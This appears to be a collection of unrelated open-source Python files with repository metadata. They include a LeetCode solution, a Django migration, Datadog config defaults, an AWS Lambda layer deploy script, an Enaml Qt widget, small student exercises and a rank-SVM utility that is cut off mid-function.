d8b1f1388e4a768f0006ce3f1ac5e57574bc519b | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /time_or_world/see_long_case_under_year/early_day_or_hand.py | e5672fa966bf5cb831f37a71568f7efcaca277b6 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py |
#! /usr/bin/env python
def early_fact(str_arg):
place_and_young_government(str_arg)
print('other_problem')
def place_and_young_government(str_arg):
print(str_arg)
if __name__ == '__main__':
early_fact('great_man_or_man')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
e5f64d8df89dd8374d572ba638269fb1af708fd3 | c9e0227c3958db89747488328bd2b255e54f008f | /solutions/0748. Shortest Completing Word/0748.py | a4b585f171fb2752d25e76439753fa102ae11038 | [] | no_license | XkhldY/LeetCode | 2deba28b7491c36b4f224c3132fb89feea318832 | 94e23db2668615d9fe09e129a96c22ae4e83b9c8 | refs/heads/main | 2023-04-03T08:17:30.743071 | 2021-04-14T23:34:03 | 2021-04-14T23:34:03 | 358,136,537 | 1 | 0 | null | 2021-04-15T05:20:21 | 2021-04-15T05:20:21 | null | UTF-8 | Python | false | false | 492 | py | class Solution:
def shortestCompletingWord(self, licensePlate: str, words: List[str]) -> str:
def isMatch(word: str) -> bool:
wordCount = Counter(word)
return False if any(wordCount[i] < count[i] for i in string.ascii_letters) else True
ans = '*' * 16
count = defaultdict(int)
for c in licensePlate:
if c.isalpha():
count[c.lower()] += 1
for word in words:
if len(word) < len(ans) and isMatch(word):
ans = word
return ans
| [
"walkccray@gmail.com"
] | walkccray@gmail.com |
9da8ce2b393a9e221c614b46da6993a8350023c7 | 2b0eab74af8d23244ff11699830f9bb10fbd717a | /visit_report/migrations/0051_remove_cite_steps.py | 76dc57044caf2e095a4415fa7a366948cb1549e3 | [] | no_license | alexandrenorman/mixeur | c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b | 95d21cd6036a99c5f399b700a5426e9e2e17e878 | refs/heads/main | 2023-03-13T23:50:11.800627 | 2021-03-07T15:49:15 | 2021-03-07T15:49:15 | 345,384,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.db import migrations
def remove_cite_steps(apps, schema_editor):
Steps = apps.get_model('visit_report', 'Step')
Steps.objects.filter(category="financing", milestone="work-end", nature="cite").delete()
class Migration(migrations.Migration):
dependencies = [
('visit_report', '0050_add_prime_renov_step'),
]
operations = [
migrations.RunPython(remove_cite_steps),
]
| [
"norman@xael.org"
] | norman@xael.org |
0ef74428d763b21c1f13e563f623565510db01d0 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/star_needs_assignment_target_py35.py | 58e43dbacb50b64cee73eb2d348f19ea84d2a1ee | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 445 | py | """
Test PEP 0448 -- Additional Unpacking Generalizations
https://www.python.org/dev/peps/pep-0448/
"""
# pylint: disable=superfluous-parens
UNPACK_TUPLE = (*range(4), 4)
UNPACK_LIST = [*range(4), 4]
UNPACK_SET = {*range(4), 4}
UNPACK_DICT = {'a': 1, **{'b': '2'}}
UNPACK_DICT2 = {**UNPACK_DICT, "x": 1, "y": 2}
UNPACK_DICT3 = {**{'a': 1}, 'a': 2, **{'a': 3}}
UNPACK_IN_COMP = {elem for elem in (*range(10))} # [star-needs-assignment-target]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
f2e355dfe0f62b71a7bc35dd20e268a5f7c5387a | 6ceeb3adb08da8754f59a117f39d401948988f0a | /spark/datadog_checks/spark/config_models/defaults.py | 30ebbb0df826f22f540c8c68a8b26011fb804c1b | [
"BSD-3-Clause",
"BSD-3-Clause-Modification",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LGPL-2.1-only",
"LGPL-3.0-only",
"CC0-1.0",
"Unlicense",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Smartling/integrations-core | 794c3822f05c772c7e36fdde8b68c8c3284e71e3 | 79088364600aa8f06ec38500800f3803db77feed | refs/heads/master | 2023-04-15T14:21:50.017308 | 2023-04-11T20:13:26 | 2023-04-11T20:13:26 | 159,552,127 | 0 | 1 | BSD-3-Clause | 2023-04-07T16:38:06 | 2018-11-28T19:14:55 | Python | UTF-8 | Python | false | false | 4,552 | py | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_proxy(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def shared_skip_proxy(field, value):
return False
def shared_timeout(field, value):
return 10
def instance_allow_redirects(field, value):
return True
def instance_auth_token(field, value):
return get_default_field_value(field, value)
def instance_auth_type(field, value):
return 'basic'
def instance_aws_host(field, value):
return get_default_field_value(field, value)
def instance_aws_region(field, value):
return get_default_field_value(field, value)
def instance_aws_service(field, value):
return get_default_field_value(field, value)
def instance_connect_timeout(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_disable_legacy_cluster_tag(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_enable_query_name_tag(field, value):
return False
def instance_executor_level_metrics(field, value):
return False
def instance_extra_headers(field, value):
return get_default_field_value(field, value)
def instance_headers(field, value):
return get_default_field_value(field, value)
def instance_kerberos_auth(field, value):
return 'disabled'
def instance_kerberos_cache(field, value):
return get_default_field_value(field, value)
def instance_kerberos_delegate(field, value):
return False
def instance_kerberos_force_initiate(field, value):
return False
def instance_kerberos_hostname(field, value):
return get_default_field_value(field, value)
def instance_kerberos_keytab(field, value):
return get_default_field_value(field, value)
def instance_kerberos_principal(field, value):
return get_default_field_value(field, value)
def instance_log_requests(field, value):
return False
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_metricsservlet_path(field, value):
return '/metrics/json'
def instance_min_collection_interval(field, value):
return 15
def instance_ntlm_domain(field, value):
return get_default_field_value(field, value)
def instance_password(field, value):
return get_default_field_value(field, value)
def instance_persist_connections(field, value):
return False
def instance_proxy(field, value):
return get_default_field_value(field, value)
def instance_read_timeout(field, value):
return get_default_field_value(field, value)
def instance_request_size(field, value):
return 16
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_skip_proxy(field, value):
return False
def instance_spark_cluster_mode(field, value):
return 'spark_yarn_mode'
def instance_spark_pre_20_mode(field, value):
return False
def instance_spark_proxy_enabled(field, value):
return False
def instance_spark_ui_ports(field, value):
return get_default_field_value(field, value)
def instance_streaming_metrics(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 10
def instance_tls_ca_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_ignore_warning(field, value):
return False
def instance_tls_private_key(field, value):
return get_default_field_value(field, value)
def instance_tls_protocols_allowed(field, value):
return get_default_field_value(field, value)
def instance_tls_use_host_header(field, value):
return False
def instance_tls_verify(field, value):
return True
def instance_use_legacy_auth_encoding(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| [
"noreply@github.com"
] | Smartling.noreply@github.com |
2f21c748d4601d3ee19276f8b0c2227ee5efcd28 | 88030f69f438cbeed773d144949c00859a447a52 | /tests/delimited_file_utils/test_delimited_file_utils.py | a0a223117aa766b4de1fbb2e21a722e85ac8d3d9 | [] | no_license | ryanGT/krauss_misc | 05f5845e9915e522cb595b165e81b580019969db | d693dfd19a42ba893a0200630a0f3435711666ee | refs/heads/main | 2022-09-27T22:57:06.738155 | 2022-09-02T14:51:13 | 2022-09-02T14:51:13 | 240,044 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import delimited_file_utils
import glob
from numpy import array
files = glob.glob('email_update_grades_test*.csv')
good_labels = array(['Group Name','Content/Progress','Clarity','Writing','Apparent Effort','Overall Grade','Notes'])
passes = []
failures = []
for curfile in files:
curarray = delimited_file_utils.open_delimited_with_sniffer_and_check(curfile)
labels = curarray[0,:]
data = curarray[1:,:]
bool_vect = labels == good_labels
test1 = bool_vect.all()
test2 = data.shape == (9,7)
if test1 and test2:
passes.append(curfile)
else:
failures.append(curfile)
if len(failures) == 0:
print('all tests pass')
else:
print('passes:')
for curfile in passes:
print(curfile)
print('-----------------------------')
print('failures:')
for curfile in failures:
print(curfile)
| [
"ryanlists@gmail.com"
] | ryanlists@gmail.com |
5df4cb7698d616222b871122a1bd80d5a80a62ff | d5e279c64f7615cd14d82c59aca2ee17eef1c8f1 | /scripts/deploy-layer.py | 6830a56542322f06b17f3d9bd32892a6ce3a7194 | [] | no_license | kylebarron/cogeo-layer | d075ca12b95edf4731d89c2d68a548ec68c8a881 | f04d14ebf99dfcfa71ae5584a818956e91e8f0fa | refs/heads/master | 2021-04-18T14:25:31.567363 | 2020-03-24T03:08:34 | 2020-03-24T03:08:34 | 249,553,335 | 5 | 0 | null | 2020-03-23T23:25:28 | 2020-03-23T21:58:23 | null | UTF-8 | Python | false | false | 2,576 | py |
import click
import hashlib
from boto3.session import Session as boto3_session
AWS_REGIONS = [
"eu-central-1",
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
]
def _md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
@click.command()
@click.argument('gdalversion', type=str)
@click.argument('pythonversion', type=str)
@click.argument('layername', type=str)
def main(gdalversion, pythonversion, layername):
local_name = f"gdal{gdalversion}-py{pythonversion}-{layername}.zip"
next_layer_sha = _md5(local_name)
runtime = f"python{pythonversion}"
gdalversion_nodot = gdalversion.replace(".", "")
pythonversion_nodot = pythonversion.replace(".", "")
layer_name = f"gdal{gdalversion_nodot}-py{pythonversion_nodot}-{layername}"
description = f"Lambda Layer with GDAL{gdalversion} - {runtime} - {next_layer_sha}"
session = boto3_session()
click.echo(f"Deploying {layer_name}", err=True)
for region in AWS_REGIONS:
click.echo(f"AWS Region: {region}", err=True)
client = session.client("lambda", region_name=region)
res = client.list_layer_versions(
CompatibleRuntime=runtime, LayerName=layer_name
)
layers = res.get("LayerVersions")
click.echo(f"Found {len(layers)} versions.", err=True)
if layers:
layer = layers[0]
layer_sha = layer["Description"].split(" ")[-1]
else:
layer_sha = ""
click.echo(f"Current SHA: {layer_sha}", err=True)
click.echo(f"New SHA: {next_layer_sha}", err=True)
if layer_sha == next_layer_sha:
click.echo("No update needed", err=True)
continue
click.echo(f"Publishing new version", err=True)
with open(local_name, 'rb') as zf:
res = client.publish_layer_version(
LayerName=layer_name,
Content={"ZipFile": zf.read()},
CompatibleRuntimes=[runtime],
Description=description,
LicenseInfo="MIT"
)
version = res["Version"]
click.echo(f"Adding permission", err=True)
client.add_layer_version_permission(
LayerName=layer_name,
VersionNumber=version,
StatementId='make_public',
Action='lambda:GetLayerVersion',
Principal='*',
)
if __name__ == '__main__':
main()
| [
"vincent.sarago@gmail.com"
] | vincent.sarago@gmail.com |
f9cfddcd3da8437fd43cbe1a9e37a49a32c199a0 | 0b406d2c041c76d9ef8789539e0e3af9a50e3613 | /Extract_refactor/WebScrapy/manager.py | 37fd76cb4a79a41b493987d4e7ca799edc0f8929 | [] | no_license | aise17/ExtractPdf | 221b47c5f0e75a823284b4f52981917962042592 | 7e1bfbc759cb7473d727574e5df78eaaac9fa8a4 | refs/heads/master | 2022-02-26T06:39:14.265795 | 2019-06-04T15:01:39 | 2019-06-04T15:01:39 | 184,154,301 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from Extract_refactor.settings import IMAGENES_PATH
from .web_info import WebInfo
import unicodecsv as csv
class Manager(WebInfo):
    """CSV import/export coordinator for scraped web information.

    URLs to process are read from ``media/<ruta_entrada>`` and scraping
    results are written to ``salida/<ruta_entrada>``.
    """

    def __init__(self, ruta_entrada):
        # Example of self.resultados (the row written by export()):
        #self.resultados = {'status': 200, 'alexa': u'\n\n4,484,464 ', 'language': u'es-es', 'url': 'http://todosaintseiya.com', 'platform': ['prestashop'], 'mail': u'.todosaintseiya@hotmail.com.TODOSAINTSEIYA@HOTMAIL.COM'}
        self.ruta_entrada = ruta_entrada
        self.urls_list = []
        self.writer = ''

    def open_book_writer(self):
        """Open the output CSV for writing and emit the header row."""
        out = open('salida/' + self.ruta_entrada, 'wb')
        self.writer = csv.writer(out, lineterminator='\n', encoding='utf-8')
        self.writer.writerow(('url','alexa', 'status', 'platform', 'language', 'mail'))

    def open_book_append(self):
        """Open the output CSV in append mode (no header row)."""
        out = open('salida/' + self.ruta_entrada, 'ab')
        self.writer = csv.writer(out, lineterminator='\n', encoding='utf-8')

    def export(self):
        """Write the current ``self.resultados`` dict as one CSV row."""
        res = self.resultados
        self.writer.writerow((res['url'], res['alexa'], res['status'],
                              res['platform'], res['language'], res['mail']))

    def imports(self):
        """Load every row of ``media/<ruta_entrada>`` into ``self.urls_list``."""
        with open('media/' + self.ruta_entrada, 'rb') as f:
            reader = csv.reader(f, encoding='utf-8')
            for row in reader:
                self.urls_list.append(row)
        print (self.urls_list)
#manager = Manager()
#manager.imports()
| [
"sergio.martinez-g@hotmail.com"
] | sergio.martinez-g@hotmail.com |
7d1a8e1308c251ab8962fd8e55d64f1b6591f4cd | 0c0168a4676bce7453836a7509e7133044aa8975 | /byceps/services/shop/order/models/action.py | a522c5bf75985a56a31b5bdbfde5a96a124daac9 | [
"BSD-3-Clause"
] | permissive | byceps/byceps | 0aad3c4d974f76c6f8c3674d5539a80c9107b97a | eaee2b7fdc08c76c16ddf7f436110e0b5f1812e5 | refs/heads/main | 2023-09-01T04:03:13.365687 | 2023-09-01T03:28:18 | 2023-09-01T03:28:18 | 40,150,239 | 44 | 23 | BSD-3-Clause | 2023-05-16T18:41:32 | 2015-08-03T22:05:23 | Python | UTF-8 | Python | false | false | 565 | py | """
byceps.services.shop.order.models.action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2023 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from dataclasses import dataclass
from typing import Any
from uuid import UUID
from byceps.services.shop.article.models import ArticleID
from .order import PaymentState
# Keyword arguments handed to the action's procedure.
ActionParameters = dict[str, Any]


@dataclass(frozen=True)
class Action:
    # Immutable value object tying a procedure to an article and a payment
    # state.  Presumably the procedure runs when an order containing the
    # article reaches that payment state — confirm against the action service.
    id: UUID                      # primary key of the action record
    article_id: ArticleID         # article this action is attached to
    payment_state: PaymentState   # payment state associated with the action
    procedure_name: str           # name of the procedure to execute
    parameters: ActionParameters  # parameters passed to the procedure
| [
"homework@nwsnet.de"
] | homework@nwsnet.de |
2e0c98154ff9965f3b78d4ec24114cbfb88b9b4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/209/32491/submittedfiles/swamee.py | 4e0b7ced6a958750f520d5f31ba92b776a1694b6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI


def diametro(f, L, Q, DELTAH, g=9.81):
    """Pipe diameter from head loss: D = (8*f*L*Q^2 / (pi^2*g*DELTAH))^(1/5)."""
    return ((8 * f * L * (Q ** 2)) / ((math.pi ** 2) * g * DELTAH)) ** (1 / 5)


def reynolds(Q, D, V):
    """Reynolds number for pipe flow: Re = 4*Q / (pi*D*V).

    Fixes the original precedence bug ``4*Q/math.pi*D*V`` (which computed
    4*Q*D*V/pi instead of dividing by pi*D*V).
    """
    return 4 * Q / (math.pi * D * V)


def swamee_jain(e, D, Rey):
    """Swamee-Jain friction factor: 0.25 / [log10(e/(3.7*D) + 5.74/Re^0.9)]^2.

    Fixes the original missing closing parenthesis (a SyntaxError) and the
    ``e/3.7*D`` precedence bug (relative roughness is e/(3.7*D)).
    """
    return 0.25 / (math.log10(e / (3.7 * D) + 5.74 / Rey ** 0.9)) ** 2


if __name__ == '__main__':
    # Interactive inputs, as required by the exercise; prompts kept verbatim.
    f = float(input('digite o valor f:'))
    L = float(input('Digite o valor L:'))
    Q = float(input('Digite o valor Q:'))
    DELTAH = float(input('Digite o valor DELTAH:'))
    V = float(input('digite o valor V:'))
    g = 9.81
    e = 0.000002
    D = diametro(f, L, Q, DELTAH, g)
    Rey = reynolds(Q, D, V)
    k = swamee_jain(e, D, Rey)
    print('O valor D é %.4f' % D)
    print('O valor Rey é %.4f' % Rey)
    print('O valor k é %f' % k)
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
30017f7b526335a428e035841353278b9d337ae7 | 997180420fabdd6f730f4673dba1f979bd91e699 | /apps/goods/t1.py | 70106faaf0574a7c9f66d963b3cb6942a4f54227 | [] | no_license | bwisgood/drf20F_api_pro | 66bb17479594247a2e74e4eef7434cdaf8b54de9 | ff4579ce8eaca7071ea27b5d071a58dbf63c2385 | refs/heads/master | 2020-03-27T02:52:28.973201 | 2018-09-20T05:01:40 | 2018-09-20T05:01:40 | 145,823,482 | 1 | 0 | null | 2018-08-23T14:00:24 | 2018-08-23T08:20:25 | JavaScript | UTF-8 | Python | false | false | 243 | py | class A:
    # Class attribute shared by all instances.
    a = 1

    def __init__(self):
        # NOTE(review): ``b`` is a local variable, not ``self.b`` — it is
        # discarded when __init__ returns.  Possibly deliberate in this
        # demo, but confirm it was not meant to be an instance attribute.
        b = 2

    def __repr__(self):
        # Used by repr() and the explicit __repr__() call below.
        return "123"

    def __str__(self):
        # Used by str()/print(), so ``print(a)`` shows "456".
        return "456"
if __name__ == '__main__':
    # Demonstrates __repr__ vs __str__: repr(a) and a.__repr__() both print
    # "123", while print(a) goes through __str__ and prints "456".
    a = A()
    print(repr(a))
    print(a.__repr__())
    print(a)
"857464370@qq.com"
] | 857464370@qq.com |
588728ae141a1688b6adb628431a81037164d133 | 7b437e095068fb3f615203e24b3af5c212162c0d | /enaml/qt/qt_time_selector.py | 44ed2090c63a693722eb360745f4e4e37af26edb | [
"BSD-3-Clause"
] | permissive | ContinuumIO/enaml | d8200f97946e5139323d22fba32c05231c2b342a | 15c20b035a73187e8e66fa20a43c3a4372d008bd | refs/heads/master | 2023-06-26T16:16:56.291781 | 2013-03-26T21:13:52 | 2013-03-26T21:13:52 | 9,047,832 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,978 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from PyQt4.QtGui import QTimeEdit
from atom.api import Typed
from enaml.widgets.time_selector import ProxyTimeSelector
from .qt_bounded_time import QtBoundedTime, CHANGED_GUARD
class QtTimeSelector(QtBoundedTime, ProxyTimeSelector):
    """ A Qt implementation of an Enaml ProxyTimeSelector.

    """
    #: A reference to the widget created by the proxy.
    widget = Typed(QTimeEdit)

    #--------------------------------------------------------------------------
    # Initialization API
    #--------------------------------------------------------------------------
    def create_widget(self):
        """ Create the QTimeEdit widget.

        """
        self.widget = QTimeEdit(self.parent_widget())

    def init_widget(self):
        """ Initialize the widget.

        """
        super(QtTimeSelector, self).init_widget()
        d = self.declaration
        self.set_time_format(d.time_format)
        # Connected only after the initial format is applied; from here on
        # user edits in the widget notify on_time_changed.
        self.widget.timeChanged.connect(self.on_time_changed)

    #--------------------------------------------------------------------------
    # Abstract API Implementation
    #--------------------------------------------------------------------------
    def get_time(self):
        """ Return the current time in the control.

        Returns
        -------
        result : time
            The current control time as a time object.

        """
        return self.widget.time().toPyTime()

    def set_minimum(self, time):
        """ Set the widget's minimum time.

        Parameters
        ----------
        time : time
            The time object to use for setting the minimum time.

        """
        self.widget.setMinimumTime(time)

    def set_maximum(self, time):
        """ Set the widget's maximum time.

        Parameters
        ----------
        time : time
            The time object to use for setting the maximum time.

        """
        self.widget.setMaximumTime(time)

    def set_time(self, time):
        """ Set the widget's current time.

        Parameters
        ----------
        time : time
            The time object to use for setting the time.

        """
        # The guard bit marks this as a programmatic change; presumably the
        # timeChanged handler in QtBoundedTime checks it to avoid echoing
        # the change back to Enaml — confirm in qt_bounded_time.
        self._guard |= CHANGED_GUARD
        try:
            self.widget.setTime(time)
        finally:
            self._guard &= ~CHANGED_GUARD

    def set_time_format(self, format):
        """ Set the widget's time format.

        Parameters
        ----------
        format : str
            A Python time formatting string.

        """
        # XXX make sure Python's and Qt's format strings are the
        # same, or convert between the two.
        self.widget.setDisplayFormat(format)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
9c55db4b00565f4ffe3a2d50ced5d3e2220ced2e | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/PictureUpdateRequest.py | b32556481ce925c61750073a18148e80e3b936fa | [] | no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class PictureUpdateRequest(RestApi):
    """REST request wrapper for the ``taobao.picture.update`` TOP endpoint."""

    def __init__(self, domain='gw.api.taobao.com', port=80):
        RestApi.__init__(self, domain, port)
        # Request parameters; the caller fills these in before sending.
        self.picture_id = None
        self.new_name = None

    def getapiname(self):
        """Return the TOP API method name for this request."""
        return 'taobao.picture.update'
| [
"poorevil@gmail.com"
] | poorevil@gmail.com |
2157f5ad78c10962340a58bdd733a32257639f36 | 6e3d061f94468905841a918278a352d4e5df89a1 | /hashicorp_vault_client/test/test_body70.py | 4abc0cc541b05ec6a2c886617b334da9410acb06 | [
"Apache-2.0"
] | permissive | drewmullen/HAC | 179a4188e6e6ce3a36d480e45f238fd0901a710f | fb185804fd244366f8f8d01df22835b3d96e7512 | refs/heads/master | 2020-08-03T12:13:08.785915 | 2019-10-03T18:33:04 | 2019-10-03T18:33:04 | 211,749,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # coding: utf-8
"""
HashiCorp Vault API
HTTP API that gives you full access to Vault. All API routes are prefixed with `/v1/`. # noqa: E501
OpenAPI spec version: 1.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import hashicorp_vault_client
from models.body70 import Body70 # noqa: E501
from hashicorp_vault_client.rest import ApiException
class TestBody70(unittest.TestCase):
    """Unit-test stubs for the generated ``Body70`` model."""

    def setUp(self):
        # No fixtures required yet.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testBody70(self):
        """Test Body70"""
        # FIXME: construct object with mandatory attributes with example values
        # model = hashicorp_vault_client.models.body70.Body70()  # noqa: E501
        pass
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| [
"drew@nebulaworks.com"
] | drew@nebulaworks.com |
bc31123ae5db9b82f65e97d1036afeff59cb28f4 | 5af41b5507a535cc228673f05c5da215c93a76b5 | /practice/puzzles/medium/Flood fill Example.py | 79d3877a13788695f417bc1a52f1ef3d83e793f1 | [] | no_license | mithrantir/CodinGame | d308f50f3d74bb105e678d0b66e439c68b07f9a1 | 306ead31859b3b499019adadbdd41631781ad192 | refs/heads/master | 2022-07-14T20:41:05.380179 | 2020-05-17T21:15:15 | 2020-05-17T21:15:15 | 259,610,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,169 | py |
# Flood fill: towers (any cell that is neither '.' nor '#') expand one step
# per round into adjacent '.' cells; cells reached by two different towers
# in the same round become '+'.  '#' cells are never claimed.
with open('000.txt') as f:
    read_data = f.read().split('\n')
w = int(read_data[0])
h = int(read_data[1])
# w = int(input())
# h = int(input())
alderaan = []
for i in range(h):
    # alderaan.append([c for c in input()])
    alderaan.append([c for c in read_data[2 + i]])

# Map each tower's seed position to its current frontier (the cells it
# claimed on the previous round).
tower = {}
for i in range(h):
    for j in range(w):
        if alderaan[i][j] != '.' and alderaan[i][j] != '#':
            tower[(i, j)] = [[i, j]]

expand = True
while expand:
    exp_points = {}
    for (tx, ty) in tower:
        tow_exp = []
        for i, j in tower[(tx, ty)]:
            # Refactor: the original repeated this logic four times, once
            # per direction; one loop over the neighbour offsets
            # (up, down, left, right — same order) is equivalent.
            for di, dj in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                ni, nj = i + di, j + dj
                if 0 <= ni < h and 0 <= nj < w and alderaan[ni][nj] == '.':
                    tow_exp.append([ni, nj])
                    if (ni, nj) in exp_points and exp_points[(ni, nj)][1] != [tx, ty]:
                        # Contested: a different tower already reached it
                        # this round.
                        exp_points[(ni, nj)] = ['+', [-1, -1]]
                    else:
                        exp_points[(ni, nj)] = [alderaan[tx][ty], [tx, ty]]
        tower[(tx, ty)] = tow_exp
    if len(exp_points) == 0:
        expand = False
    else:
        # Commit this round's claims to the grid.
        for (i, j) in exp_points:
            alderaan[i][j] = exp_points[(i, j)][0]

for i in range(h):
    print("".join(c for c in alderaan[i]))
| [
"christophoros.mouratidis@gmail.com"
] | christophoros.mouratidis@gmail.com |
9a7925334b208a1c4ede6feb518cced7303356b4 | fb0018545b1f0646a59a51522fd32ccbaf4c0bb7 | /py/escher/tests/test_urls.py | 1fd5806a34e1380e1a858f5be0f0e0a1b333f9ad | [
"MIT"
] | permissive | DD-DeCaF/escher | 083341268dad2195b402ae80391eb93e54b88365 | cd2c81bc62199f9349a9f24dd7a0a148fa6adc46 | refs/heads/master | 2022-07-24T18:49:55.835648 | 2020-02-15T14:48:52 | 2020-02-15T14:51:22 | 84,944,610 | 1 | 0 | NOASSERTION | 2018-10-08T08:50:49 | 2017-03-14T12:06:53 | JavaScript | UTF-8 | Python | false | false | 887 | py | from escher.urls import (
get_url,
get_filepath,
root_directory,
)
from escher.version import (
__version__,
__schema_version__,
__map_model_version__,
)
from os.path import join, exists
from pytest import raises
def test_online():
    # The bundled JS is served from the versioned unpkg CDN URL.
    url = get_url('escher')
    assert url == 'https://unpkg.com/escher@%s/dist/escher.js' % __version__


def test_local():
    # The map JSON schema ships with the installed package.
    assert exists(get_filepath('map_jsonschema'))


def test_index_url():
    # Server index URL is namespaced by schema and map/model versions.
    url = get_url('server_index')
    assert url == ('https://escher.github.io/%s/%s/index.json' %
                   (__schema_version__, __map_model_version__))


def test_map_download_url():
    # Map downloads live under the same versioned namespace.
    url = get_url('map_download')
    assert url == ('https://escher.github.io/%s/%s/maps/' %
                   (__schema_version__, __map_model_version__))


def test_bad_url():
    # Unknown resource names must raise rather than return a guess.
    with raises(Exception):
        get_url('bad-name')
| [
"zaking17@gmail.com"
] | zaking17@gmail.com |
d2309b65fbdf81233c3fec89a1b2055bfd35d8cb | d8761daf7bf2b75b9925b12450da2a6ea3d31140 | /tlbo/utils/rank_svm.py | c29c536605ebe543d3a59c20d0899f65957ca633 | [] | no_license | pyz2020/efficient-tlbo-DL-Model-Reoptimizations | 5dcc2c522d9430b4fab534689fd338fbfc6a6945 | dd2ed9c91b970e0ab4c0ed82382567ec0df6c42b | refs/heads/master | 2023-01-06T18:33:33.726527 | 2020-11-04T08:09:13 | 2020-11-04T08:09:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | import itertools
import numpy as np
from scipy import stats
from sklearn import svm, linear_model, model_selection
def transform_pairwise(X, y):
    """Convert a ranking problem into balanced pairwise classification data.

    Each pair of samples with different target values (and, when ``y`` has a
    second column, the same group id) contributes one difference vector
    ``X[i] - X[j]`` labelled with the sign of the target difference.  The
    signs are alternated with the pair index so the two output classes
    {-1, +1} are balanced.

    Parameters
    ----------
    X : array, shape (n_samples, n_features)
        The data.
    y : array, shape (n_samples,) or (n_samples, 2)
        Targets; an optional second column holds group ids, and samples
        from different groups are never paired.

    Returns
    -------
    X_trans : array, shape (k, n_features)
        Difference vectors, one per retained pair.
    y_trans : array, shape (k,)
        Pair labels, values in {-1, +1}.
    """
    labels = np.asarray(y)
    if labels.ndim == 1:
        # No group column supplied: place every sample in one group.
        labels = np.c_[labels, np.ones(labels.shape[0])]
    diffs = []
    signs = []
    pair_indices = itertools.combinations(range(X.shape[0]), 2)
    for k, (a, b) in enumerate(pair_indices):
        if labels[a, 0] == labels[b, 0] or labels[a, 1] != labels[b, 1]:
            # Skip ties and cross-group pairs.
            continue
        delta = X[a] - X[b]
        sign = np.sign(labels[a, 0] - labels[b, 0])
        if sign != (-1) ** k:
